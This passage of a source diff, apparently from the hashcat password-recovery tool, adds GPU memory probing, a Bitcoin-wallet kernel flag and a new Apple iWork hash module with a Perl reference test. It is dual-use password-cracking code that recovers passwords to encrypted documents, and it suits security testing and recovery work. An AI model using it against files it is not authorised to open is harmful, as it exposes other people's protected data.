+        // The best way to work around this problem would be to ask for the available memory, but we cannot.
+        // The idea here is to estimate the available memory by allocating it until an allocation fails.
 
-  //if ((cuda_devices_cnt > 0) && (opencl_devices_cnt > 0))
-  //{
-    // using force here enables both devices, which is the worst possible outcome
-    // many users force by default, so this is not a good idea
+        cl_mem *tmp_device = (cl_mem *) hccalloc (MAX_ALLOC_CHECKS_CNT, sizeof (cl_mem));
 
-    //if (user_options->force == false)
-    //{
-    backend_ctx_find_alias_devices (hashcat_ctx);
-    //{
-  //}
+        u64 c;
 
-  if (backend_ctx->backend_devices_active == 0)
-  {
-    event_log_error (hashcat_ctx, "No devices found/left.");
+        for (c = 0; c < MAX_ALLOC_CHECKS_CNT; c++)
+        {
+          if (((c + 1 + 1) * MAX_ALLOC_CHECKS_SIZE) >= device_param->device_global_mem) break;
 
-    return -1;
-  }
+          cl_int CL_err;
 
-  // now we can calculate the number of parallel running hook threads based on
-  // the number cpu cores and the number of active compute devices
-  // unless overwritten by the user
+          OCL_PTR *ocl = (OCL_PTR *) backend_ctx->ocl;
 
-  if (user_options->hook_threads == HOOK_THREADS)
-  {
-    const u32 processor_count = hc_get_processor_count ();
+          tmp_device[c] = ocl->clCreateBuffer (context, CL_MEM_READ_WRITE, MAX_ALLOC_CHECKS_SIZE, NULL, &CL_err);
 
-    const u32 processor_count_cu = CEILDIV (processor_count, backend_ctx->backend_devices_active); // should never reach 0
+          if (CL_err != CL_SUCCESS)
+          {
+            c--;
 
-    user_options->hook_threads = processor_count_cu;
-  }
+            break;
+          }
 
-  // additional check to see if the user has chosen a device that is not within the range of available devices (i.e. larger than devices_cnt)
+          // transferring only a few bytes should be enough to force the runtime to actually allocate the memory
 
-  if (backend_ctx->backend_devices_filter != (u64) -1)
-  {
-    const u64 backend_devices_cnt_mask = ~(((u64) -1 >> backend_ctx->backend_devices_cnt) << backend_ctx->backend_devices_cnt);
+          u8 tmp_host[8];
 
-    if (backend_ctx->backend_devices_filter > backend_devices_cnt_mask)
-    {
-      event_log_error (hashcat_ctx, "An invalid device was specified using the --backend-devices parameter.");
-      event_log_error (hashcat_ctx, "The specified device was higher than the number of available devices (%u).", backend_ctx->backend_devices_cnt);
+          if (ocl->clEnqueueReadBuffer  (command_queue, tmp_device[c], CL_TRUE, 0, sizeof (tmp_host), tmp_host, 0, NULL, NULL) != CL_SUCCESS) break;
 
-      return -1;
+          if (ocl->clEnqueueWriteBuffer (command_queue, tmp_device[c], CL_TRUE, 0, sizeof (tmp_host), tmp_host, 0, NULL, NULL) != CL_SUCCESS) break;
+
+          if (ocl->clEnqueueReadBuffer  (command_queue, tmp_device[c], CL_TRUE, MAX_ALLOC_CHECKS_SIZE - sizeof (tmp_host), sizeof (tmp_host), tmp_host, 0, NULL, NULL) != CL_SUCCESS) break;
+
+          if (ocl->clEnqueueWriteBuffer (command_queue, tmp_device[c], CL_TRUE, MAX_ALLOC_CHECKS_SIZE - sizeof (tmp_host), sizeof (tmp_host), tmp_host, 0, NULL, NULL) != CL_SUCCESS) break;
+        }
+
+        device_param->device_available_mem = MAX_ALLOC_CHECKS_SIZE;
+
+        if (c > 0)
+        {
+          device_param->device_available_mem *= c;
+        }
+
+        // clean up
+
+        for (c = 0; c < MAX_ALLOC_CHECKS_CNT; c++)
+        {
+          if (((c + 1 + 1) * MAX_ALLOC_CHECKS_SIZE) >= device_param->device_global_mem) break;
+
+          if (tmp_device[c] != NULL)
+          {
+            if (hc_clReleaseMemObject (hashcat_ctx, tmp_device[c]) == -1) return -1;
+          }
+        }
+
+        hcfree (tmp_device);
+      }
+
+      hc_clReleaseCommandQueue (hashcat_ctx, command_queue);
+
+      hc_clReleaseContext (hashcat_ctx, context);
     }
   }
 
diff --git a/src/modules/module_11300.c b/src/modules/module_11300.c
index 044383bf0..bf9833fc3 100644
--- a/src/modules/module_11300.c
+++ b/src/modules/module_11300.c
@@ -26,7 +26,8 @@ static const u32   OPTI_TYPE      = OPTI_TYPE_ZERO_BYTE
 static const u64   OPTS_TYPE      = OPTS_TYPE_PT_GENERATE_LE
                                   | OPTS_TYPE_ST_HEX
                                   | OPTS_TYPE_ST_ADD80
-                                  | OPTS_TYPE_HASH_COPY;
+                                  | OPTS_TYPE_HASH_COPY
+                                  | OPTS_TYPE_DEEP_COMP_KERNEL;
 static const u32   SALT_TYPE      = SALT_TYPE_EMBEDDED;
 static const char *ST_PASS        = "hashcat";
 static const char *ST_HASH        = "$bitcoin$96$c265931309b4a59307921cf054b4ec6b6e4554369be79802e94e16477645777d948ae1d375191831efc78e5acd1f0443$16$8017214013543185$200460$96$480008005625057442352316337722323437108374245623701184230273883222762730232857701607167815448714$66$014754433300175043011633205413774877455616682000536368706315333388";
@@ -100,6 +101,11 @@ char *module_jit_build_options (MAYBE_UNUSED const hashconfig_t *hashconfig, MAY
   return jit_build_options;
 }
 
+u32 module_deep_comp_kernel (MAYBE_UNUSED const hashes_t *hashes, MAYBE_UNUSED const u32 salt_pos, MAYBE_UNUSED const u32 digest_pos)
+{
+  return KERN_RUN_3;
+}
+
 u64 module_esalt_size (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra)
 {
   const u64 esalt_size = (const u64) sizeof (bitcoin_wallet_t);
@@ -283,7 +289,7 @@ void module_init (module_ctx_t *module_ctx)
   module_ctx->module_benchmark_mask           = MODULE_DEFAULT;
   module_ctx->module_benchmark_salt           = MODULE_DEFAULT;
   module_ctx->module_build_plain_postprocess  = MODULE_DEFAULT;
-  module_ctx->module_deep_comp_kernel         = MODULE_DEFAULT;
+  module_ctx->module_deep_comp_kernel         = module_deep_comp_kernel;
   module_ctx->module_dgst_pos0                = module_dgst_pos0;
   module_ctx->module_dgst_pos1                = module_dgst_pos1;
   module_ctx->module_dgst_pos2                = module_dgst_pos2;
diff --git a/src/modules/module_13200.c b/src/modules/module_13200.c
index 62641dde1..e82bc01a2 100644
--- a/src/modules/module_13200.c
+++ b/src/modules/module_13200.c
@@ -17,7 +17,7 @@ static const u32   DGST_POS2      = 2;
 static const u32   DGST_POS3      = 3;
 static const u32   DGST_SIZE      = DGST_SIZE_4_4;
 static const u32   HASH_CATEGORY  = HASH_CATEGORY_ARCHIVE;
-static const char *HASH_NAME      = "AxCrypt";
+static const char *HASH_NAME      = "AxCrypt 1";
 static const u64   KERN_TYPE      = 13200;
 static const u32   OPTI_TYPE      = OPTI_TYPE_ZERO_BYTE;
 static const u64   OPTS_TYPE      = OPTS_TYPE_PT_GENERATE_LE;
diff --git a/src/modules/module_13300.c b/src/modules/module_13300.c
index 3a24a8e17..9fae83b87 100644
--- a/src/modules/module_13300.c
+++ b/src/modules/module_13300.c
@@ -17,7 +17,7 @@ static const u32   DGST_POS2      = 3;
 static const u32   DGST_POS3      = 2;
 static const u32   DGST_SIZE      = DGST_SIZE_4_5;
 static const u32   HASH_CATEGORY  = HASH_CATEGORY_ARCHIVE;
-static const char *HASH_NAME      = "AxCrypt in-memory SHA1";
+static const char *HASH_NAME      = "AxCrypt 1 in-memory SHA1";
 static const u64   KERN_TYPE      = 13300;
 static const u32   OPTI_TYPE      = OPTI_TYPE_ZERO_BYTE
                                   | OPTI_TYPE_PRECOMPUTE_INIT
diff --git a/src/modules/module_14800.c b/src/modules/module_14800.c
index 26926f661..99e634848 100644
--- a/src/modules/module_14800.c
+++ b/src/modules/module_14800.c
@@ -21,7 +21,8 @@ static const u32   HASH_CATEGORY  = HASH_CATEGORY_ARCHIVE;
 static const char *HASH_NAME      = "iTunes backup >= 10.0";
 static const u64   KERN_TYPE      = 14800;
 static const u32   OPTI_TYPE      = OPTI_TYPE_ZERO_BYTE
-                                  | OPTI_TYPE_SLOW_HASH_SIMD_LOOP;
+                                  | OPTI_TYPE_SLOW_HASH_SIMD_LOOP
+                                  | OPTI_TYPE_SLOW_HASH_SIMD_LOOP2;
 static const u64   OPTS_TYPE      = OPTS_TYPE_PT_GENERATE_LE
                                   | OPTS_TYPE_ST_HEX
                                   | OPTS_TYPE_INIT2
diff --git a/src/modules/module_23300.c b/src/modules/module_23300.c
new file mode 100644
index 000000000..7b085db3a
--- /dev/null
+++ b/src/modules/module_23300.c
@@ -0,0 +1,327 @@
+/**
+ * Author......: See docs/credits.txt
+ * License.....: MIT
+ */
+
+#include "common.h"
+#include "types.h"
+#include "modules.h"
+#include "bitops.h"
+#include "convert.h"
+#include "shared.h"
+
+static const u32   ATTACK_EXEC    = ATTACK_EXEC_OUTSIDE_KERNEL;
+static const u32   DGST_POS0      = 0;
+static const u32   DGST_POS1      = 1;
+static const u32   DGST_POS2      = 2;
+static const u32   DGST_POS3      = 3;
+static const u32   DGST_SIZE      = DGST_SIZE_4_4;
+static const u32   HASH_CATEGORY  = HASH_CATEGORY_DOCUMENTS;
+static const char *HASH_NAME      = "Apple iWork";
+static const u64   KERN_TYPE      = 23300;
+static const u32   OPTI_TYPE      = OPTI_TYPE_ZERO_BYTE
+                                  | OPTI_TYPE_SLOW_HASH_SIMD_LOOP;
+static const u64   OPTS_TYPE      = OPTS_TYPE_PT_GENERATE_LE
+                                  | OPTS_TYPE_ST_HEX;
+static const u32   SALT_TYPE      = SALT_TYPE_EMBEDDED;
+static const char *ST_PASS        = "hashcat";
+static const char *ST_HASH        = "$iwork$2$1$1$4000$b31b7320d1e7a5ee$01f54d6f9e5090eb16fef2b05f8242bc$69561c985268326b7353fb22c3685a378341127557bd2bbea1bd10afb31f2127344707b662a2c29480c32b8b93dea0538327f604e5aa8733be83af25f370f7ac";
+
+u32         module_attack_exec    (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return ATTACK_EXEC;     }
+u32         module_dgst_pos0      (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return DGST_POS0;       }
+u32         module_dgst_pos1      (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return DGST_POS1;       }
+u32         module_dgst_pos2      (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return DGST_POS2;       }
+u32         module_dgst_pos3      (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return DGST_POS3;       }
+u32         module_dgst_size      (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return DGST_SIZE;       }
+u32         module_hash_category  (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return HASH_CATEGORY;   }
+const char *module_hash_name      (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return HASH_NAME;       }
+u64         module_kern_type      (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return KERN_TYPE;       }
+u32         module_opti_type      (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return OPTI_TYPE;       }
+u64         module_opts_type      (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return OPTS_TYPE;       }
+u32         module_salt_type      (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return SALT_TYPE;       }
+const char *module_st_hash        (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return ST_HASH;         }
+const char *module_st_pass        (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra) { return ST_PASS;         }
+
+typedef struct iwork_tmp
+{
+  u32 ipad[5];
+  u32 opad[5];
+
+  u32 dgst[5];
+  u32 out[5];
+
+} iwork_tmp_t;
+
+typedef struct iwork
+{
+  u32 iv[4];    // 16 bytes: hex-decoded from the 32-char IV field of the hash line
+  u32 data[16]; // 64 bytes: hex-decoded from the 128-char data field of the hash line
+
+} iwork_t;
+
+static const char *SIGNATURE_IWORK  = "$iwork$";
+static const u32   FORMAT_NUM_IWORK = 1;
+
+u64 module_tmp_size (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra)
+{
+  const u64 tmp_size = (const u64) sizeof (iwork_tmp_t);
+
+  return tmp_size;
+}
+
+u64 module_esalt_size (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra)
+{
+  const u64 esalt_size = (const u64) sizeof (iwork_t);
+
+  return esalt_size;
+}
+
+u32 module_pw_max (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const user_options_t *user_options, MAYBE_UNUSED const user_options_extra_t *user_options_extra)
+{
+  // This overrides the reduction of PW_MAX that applies when an optimized kernel is selected,
+  // i.e. even in optimized kernel mode this module supports passwords up to length 256.
+
+  const u32 pw_max = PW_MAX;
+
+  return pw_max;
+}
+
+int module_hash_decode (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED void *digest_buf, MAYBE_UNUSED salt_t *salt, MAYBE_UNUSED void *esalt_buf, MAYBE_UNUSED void *hook_salt_buf, MAYBE_UNUSED hashinfo_t *hash_info, const char *line_buf, MAYBE_UNUSED const int line_len)
+{
+  u32 *digest = (u32 *) digest_buf;
+
+  iwork_t *iwork = (iwork_t *) esalt_buf;
+
+  token_t token;
+  // expected line: $iwork$<hash_ver>$<file_ver>$<format>$<iterations>$<salt>$<iv>$<data>
+  token.token_cnt  = 8;
+
+  token.signatures_cnt    = 1;
+  token.signatures_buf[0] = SIGNATURE_IWORK;
+
+  token.len[0]     = 7;
+  token.attr[0]    = TOKEN_ATTR_FIXED_LENGTH
+                   | TOKEN_ATTR_VERIFY_SIGNATURE;
+
+  token.len_min[1] = 1;
+  token.len_max[1] = 1;
+  token.sep[1]     = '$';
+  token.attr[1]    = TOKEN_ATTR_VERIFY_LENGTH
+                   | TOKEN_ATTR_VERIFY_DIGIT;
+
+  token.len_min[2] = 1;
+  token.len_max[2] = 1;
+  token.sep[2]     = '$';
+  token.attr[2]    = TOKEN_ATTR_VERIFY_LENGTH
+                   | TOKEN_ATTR_VERIFY_DIGIT;
+
+  token.len_min[3] = 1;
+  token.len_max[3] = 1;
+  token.sep[3]     = '$';
+  token.attr[3]    = TOKEN_ATTR_VERIFY_LENGTH
+                   | TOKEN_ATTR_VERIFY_DIGIT;
+
+  token.len_min[4] = 4;
+  token.len_max[4] = 6;
+  token.sep[4]     = '$';
+  token.attr[4]    = TOKEN_ATTR_VERIFY_LENGTH
+                   | TOKEN_ATTR_VERIFY_DIGIT;
+
+  token.len_min[5] = 16;
+  token.len_max[5] = 32;
+  token.sep[5]     = '$';
+  token.attr[5]    = TOKEN_ATTR_VERIFY_LENGTH
+                   | TOKEN_ATTR_VERIFY_HEX;
+
+  token.len_min[6] = 32;
+  token.len_max[6] = 32;
+  token.sep[6]     = '$';
+  token.attr[6]    = TOKEN_ATTR_VERIFY_LENGTH
+                   | TOKEN_ATTR_VERIFY_HEX;
+
+  token.len[7]     = 128;
+  token.attr[7]    = TOKEN_ATTR_FIXED_LENGTH
+                   | TOKEN_ATTR_VERIFY_HEX;
+
+  const int rc_tokenizer = input_tokenizer ((const u8 *) line_buf, line_len, &token);
+
+  if (rc_tokenizer != PARSER_OK) return (rc_tokenizer);
+
+  const u8 *hash_ver_pos   = token.buf[1];
+  const u8 *file_ver_pos   = token.buf[2];
+  const u8 *format_ver_pos = token.buf[3];
+
+  const u32 hash_ver   = hc_strtoul ((const char *) hash_ver_pos,   NULL, 10);
+  const u32 file_ver   = hc_strtoul ((const char *) file_ver_pos,   NULL, 10);
+  const u32 format_ver = hc_strtoul ((const char *) format_ver_pos, NULL, 10);
+
+  if (format_ver != FORMAT_NUM_IWORK) return (PARSER_SALT_VALUE);
+
+  if ((hash_ver != 1) && (hash_ver != 2)) return (PARSER_SALT_VALUE);
+  if ((file_ver != 1) && (file_ver != 2)) return (PARSER_SALT_VALUE);
+
+  salt->salt_sign[0] = hash_ver;
+  salt->salt_sign[1] = file_ver;
+
+  const u8 *iter_pos = token.buf[4];
+
+  const u32 iterations = hc_strtoul ((const char *) iter_pos, NULL, 10);
+
+  if (iterations <   1000) return (PARSER_SALT_ITERATION);
+  if (iterations > 999999) return (PARSER_SALT_ITERATION);
+  // stored as iterations - 1; module_hash_encode adds the 1 back when printing
+  salt->salt_iter = iterations - 1;
+
+  // salt (16 to 32 hex chars)
+
+  const u8 *salt_pos = token.buf[5];
+  const int salt_len = token.len[5];
+
+  const bool parse_rc = generic_salt_decode (hashconfig, salt_pos, salt_len, (u8 *) salt->salt_buf, (int *) &salt->salt_len);
+
+  salt->salt_buf[0] = byte_swap_32 (salt->salt_buf[0]);
+  salt->salt_buf[1] = byte_swap_32 (salt->salt_buf[1]);
+  salt->salt_buf[2] = byte_swap_32 (salt->salt_buf[2]);
+  salt->salt_buf[3] = byte_swap_32 (salt->salt_buf[3]);
+
+  if (parse_rc == false) return (PARSER_SALT_LENGTH);
+
+  // IV (32 hex chars -> 16 bytes)
+
+  const u8 *iv_pos = token.buf[6];
+  const int iv_len = token.len[6];
+
+  hex_decode (iv_pos, iv_len, (u8 *) iwork->iv);
+
+  // data (128 hex chars -> 64 bytes)
+
+  const u8 *data_pos = token.buf[7];
+  const int data_len = token.len[7];
+
+  hex_decode (data_pos, data_len, (u8 *) iwork->data);
+
+  // fake digest: the first four words of the decoded data field
+
+  digest[0] = iwork->data[0];
+  digest[1] = iwork->data[1];
+  digest[2] = iwork->data[2];
+  digest[3] = iwork->data[3];
+
+  return (PARSER_OK);
+}
+
+int module_hash_encode (MAYBE_UNUSED const hashconfig_t *hashconfig, MAYBE_UNUSED const void *digest_buf, MAYBE_UNUSED const salt_t *salt, MAYBE_UNUSED const void *esalt_buf, MAYBE_UNUSED const void *hook_salt_buf, MAYBE_UNUSED const hashinfo_t *hash_info, char *line_buf, MAYBE_UNUSED const int line_size)
+{
+  const iwork_t *iwork = (const iwork_t *) esalt_buf;
+
+  // salt: undo the byte swap applied in module_hash_decode before encoding it
+
+  u32 tmp_salt[4] = { 0 };
+
+  tmp_salt[0] = byte_swap_32 (salt->salt_buf[0]);
+  tmp_salt[1] = byte_swap_32 (salt->salt_buf[1]);
+  tmp_salt[2] = byte_swap_32 (salt->salt_buf[2]);
+  tmp_salt[3] = byte_swap_32 (salt->salt_buf[3]);
+
+  char salt_hex[33] = { 0 };
+
+  generic_salt_encode (hashconfig, (const u8 *) tmp_salt, (const int) salt->salt_len, (u8 *) salt_hex);
+
+  // iv: 16 bytes -> 32 hex chars (buffer is zero-initialized, so it stays NUL-terminated)
+
+  u8 iv_hex[33] = { 0 };
+
+  hex_encode ((u8 *) iwork->iv, 16, iv_hex);
+
+  // data: 64 bytes -> 128 hex chars (buffer is zero-initialized, so it stays NUL-terminated)
+
+  u8 data_hex[129] = { 0 };
+
+  hex_encode ((u8 *) iwork->data, 64, data_hex);
+  // salt_iter holds iterations - 1 (see module_hash_decode), hence the + 1 below
+  int out_len = snprintf (line_buf, line_size, "%s%u$%u$%u$%u$%s$%s$%s",
+    SIGNATURE_IWORK,
+    salt->salt_sign[0],
+    salt->salt_sign[1],
+    FORMAT_NUM_IWORK,
+    salt->salt_iter + 1,
+    salt_hex,
+    iv_hex,
+    data_hex
+  );
+
+  return out_len;
+}
+
+void module_init (module_ctx_t *module_ctx)
+{
+  module_ctx->module_context_size             = MODULE_CONTEXT_SIZE_CURRENT;
+  module_ctx->module_interface_version        = MODULE_INTERFACE_VERSION_CURRENT;
+
+  module_ctx->module_attack_exec              = module_attack_exec;
+  module_ctx->module_benchmark_esalt          = MODULE_DEFAULT;
+  module_ctx->module_benchmark_hook_salt      = MODULE_DEFAULT;
+  module_ctx->module_benchmark_mask           = MODULE_DEFAULT;
+  module_ctx->module_benchmark_salt           = MODULE_DEFAULT;
+  module_ctx->module_build_plain_postprocess  = MODULE_DEFAULT;
+  module_ctx->module_deep_comp_kernel         = MODULE_DEFAULT;
+  module_ctx->module_dgst_pos0                = module_dgst_pos0;
+  module_ctx->module_dgst_pos1                = module_dgst_pos1;
+  module_ctx->module_dgst_pos2                = module_dgst_pos2;
+  module_ctx->module_dgst_pos3                = module_dgst_pos3;
+  module_ctx->module_dgst_size                = module_dgst_size;
+  module_ctx->module_dictstat_disable         = MODULE_DEFAULT;
+  module_ctx->module_esalt_size               = module_esalt_size;
+  module_ctx->module_extra_buffer_size        = MODULE_DEFAULT;
+  module_ctx->module_extra_tmp_size           = MODULE_DEFAULT;
+  module_ctx->module_forced_outfile_format    = MODULE_DEFAULT;
+  module_ctx->module_hash_binary_count        = MODULE_DEFAULT;
+  module_ctx->module_hash_binary_parse        = MODULE_DEFAULT;
+  module_ctx->module_hash_binary_save         = MODULE_DEFAULT;
+  module_ctx->module_hash_decode_potfile      = MODULE_DEFAULT;
+  module_ctx->module_hash_decode_zero_hash    = MODULE_DEFAULT;
+  module_ctx->module_hash_decode              = module_hash_decode;
+  module_ctx->module_hash_encode_status       = MODULE_DEFAULT;
+  module_ctx->module_hash_encode_potfile      = MODULE_DEFAULT;
+  module_ctx->module_hash_encode              = module_hash_encode;
+  module_ctx->module_hash_init_selftest       = MODULE_DEFAULT;
+  module_ctx->module_hash_mode                = MODULE_DEFAULT;
+  module_ctx->module_hash_category            = module_hash_category;
+  module_ctx->module_hash_name                = module_hash_name;
+  module_ctx->module_hashes_count_min         = MODULE_DEFAULT;
+  module_ctx->module_hashes_count_max         = MODULE_DEFAULT;
+  module_ctx->module_hlfmt_disable            = MODULE_DEFAULT;
+  module_ctx->module_hook12                   = MODULE_DEFAULT;
+  module_ctx->module_hook23                   = MODULE_DEFAULT;
+  module_ctx->module_hook_salt_size           = MODULE_DEFAULT;
+  module_ctx->module_hook_size                = MODULE_DEFAULT;
+  module_ctx->module_jit_build_options        = MODULE_DEFAULT;
+  module_ctx->module_jit_cache_disable        = MODULE_DEFAULT;
+  module_ctx->module_kernel_accel_max         = MODULE_DEFAULT;
+  module_ctx->module_kernel_accel_min         = MODULE_DEFAULT;
+  module_ctx->module_kernel_loops_max         = MODULE_DEFAULT;
+  module_ctx->module_kernel_loops_min         = MODULE_DEFAULT;
+  module_ctx->module_kernel_threads_max       = MODULE_DEFAULT;
+  module_ctx->module_kernel_threads_min       = MODULE_DEFAULT;
+  module_ctx->module_kern_type                = module_kern_type;
+  module_ctx->module_kern_type_dynamic        = MODULE_DEFAULT;
+  module_ctx->module_opti_type                = module_opti_type;
+  module_ctx->module_opts_type                = module_opts_type;
+  module_ctx->module_outfile_check_disable    = MODULE_DEFAULT;
+  module_ctx->module_outfile_check_nocomp     = MODULE_DEFAULT;
+  module_ctx->module_potfile_custom_check     = MODULE_DEFAULT;
+  module_ctx->module_potfile_disable          = MODULE_DEFAULT;
+  module_ctx->module_potfile_keep_all_hashes  = MODULE_DEFAULT;
+  module_ctx->module_pwdump_column            = MODULE_DEFAULT;
+  module_ctx->module_pw_max                   = module_pw_max;
+  module_ctx->module_pw_min                   = MODULE_DEFAULT;
+  module_ctx->module_salt_max                 = MODULE_DEFAULT;
+  module_ctx->module_salt_min                 = MODULE_DEFAULT;
+  module_ctx->module_salt_type                = module_salt_type;
+  module_ctx->module_separator                = MODULE_DEFAULT;
+  module_ctx->module_st_hash                  = module_st_hash;
+  module_ctx->module_st_pass                  = module_st_pass;
+  module_ctx->module_tmp_size                 = module_tmp_size;
+  module_ctx->module_unstable_warning         = MODULE_DEFAULT;
+  module_ctx->module_warmup_disable           = MODULE_DEFAULT;
+}
diff --git a/tools/test_modules/m23300.pm b/tools/test_modules/m23300.pm
new file mode 100644
index 000000000..55278f77b
--- /dev/null
+++ b/tools/test_modules/m23300.pm
@@ -0,0 +1,148 @@
+#!/usr/bin/env perl
+
+##
+## Author......: See docs/credits.txt
+## License.....: MIT
+##
+
+use strict;
+use warnings;
+
+use Digest::SHA qw (sha256);
+use Crypt::PBKDF2;
+use Crypt::CBC;
+
+sub module_constraints { [[0, 256], [32, 32], [-1, -1], [-1, -1], [-1, -1]] }
+
+sub module_generate_hash
+{
+  my $word     = shift;
+  my $salt     = shift;
+  my $hash_ver = shift;
+  my $file_ver = shift;
+  my $iter     = shift;
+  my $iv       = shift;
+  my $data     = shift;
+
+  my $FORMAT = 1;
+  # $data defined => verify mode (decrypt and check it); otherwise generate a fresh random hash
+  my $is_decrypt = defined ($data);
+
+  if ($is_decrypt == 0)
+  {
+    my $type = random_number (1, 2);
+
+    if ($type == 1)
+    {
+      $hash_ver = 1;
+      $file_ver = 2;
+
+      $iter = 100000;
+      $salt = substr ($salt, 0, 32); # 32 hex chars = full 16-byte salt
+    }
+    else
+    {
+      $hash_ver = 2;
+      $file_ver = 1;
+
+      $iter = 4000;
+      $salt = substr ($salt, 0, 16); # 16 hex chars = 8-byte salt
+    }
+
+    $salt = pack ("H*", $salt);
+
+    $iv   = random_bytes (16);
+    $data = random_bytes (32);
+    # plaintext layout: 32 bytes of data followed by their SHA-256 checksum
+    $data .= sha256 ($data);
+  }
+
+  my $pbkdf2 = Crypt::PBKDF2->new
+  (
+    hasher     => Crypt::PBKDF2->hasher_from_algorithm ('HMACSHA1'),
+    iterations => $iter,
+    output_len => 16,
+  );
+
+  my $key = $pbkdf2->PBKDF2 ($salt, $word);
+
+  # AES-CBC with the raw 16-byte derived key, no header, null padding
+
+  my $cipher = Crypt::CBC->new ({
+    cipher      => "Crypt::Rijndael",
+    key         => $key,
+    iv          => $iv,
+    keysize     => 16,
+    literal_key => 1,
+    header      => "none",
+    padding     => "null"
+  });
+
+  if ($is_decrypt == 1)
+  {
+    my $hash_data = $data;
+    # pessimistic default: if the checksum check below fails, the re-encrypted hash will not match
+    $data = "WRONG";
+
+    my $decrypted = $cipher->decrypt ($hash_data);
+
+    my $raw_data = substr ($decrypted,  0, 32);
+    my $checksum = substr ($decrypted, 32, 32);
+
+    my $sha256_of_data = sha256 ($raw_data);
+
+    if ($sha256_of_data eq $checksum)
+    {
+      $data = $decrypted;
+    }
+  }
+
+  my $encrypted = $cipher->encrypt ($data);
+
+  my $hash = sprintf ("\$iwork\$%i\$%i\$%i\$%i\$%s\$%s\$%s", $hash_ver, $file_ver, $FORMAT, $iter, unpack ("H*", $salt), unpack ("H*", $iv), unpack ("H*", $encrypted));
+
+  return $hash;
+}
+
+sub module_verify_hash
+{
+  my $line = shift;
+  # input is "<hash>:<plain>"; returns (regenerated hash, plain), or nothing if the line is malformed
+  my $idx = index ($line, ':');
+
+  return unless $idx >= 0;
+
+  my $hash = substr ($line, 0, $idx);
+  my $word = substr ($line, $idx + 1);
+
+  return unless substr ($hash, 0, 7) eq '$iwork$';
+
+  my (undef, undef, $hash_ver, $file_ver, $format, $iter, $salt, $iv, $data) = split '\$', $hash;
+  # leave the sub with "return" (not "next": there is no enclosing loop in this sub)
+  return unless (defined ($hash_ver));
+  return unless (defined ($file_ver));
+  return unless (defined ($format));
+  return unless (defined ($iter));
+  return unless (defined ($salt));
+  return unless (defined ($iv));
+  return unless (defined ($data));
+
+  return unless (($hash_ver eq '1') or ($hash_ver eq '2'));
+  return unless (($file_ver eq '1') or ($file_ver eq '2'));
+
+  return unless ($format eq '1');
+  # hex fields -> raw bytes, the form module_generate_hash works with
+  $salt = pack ("H*", $salt);
+  $iv   = pack ("H*", $iv);
+  $data = pack ("H*", $data);
+
+  $iter = int ($iter);
+
+  my $word_packed = pack_if_HEX_notation ($word);
+
+  my $new_hash = module_generate_hash ($word_packed, $salt, $hash_ver, $file_ver, $iter, $iv, $data);
+
+  return ($new_hash, $word);
+}
+
+1;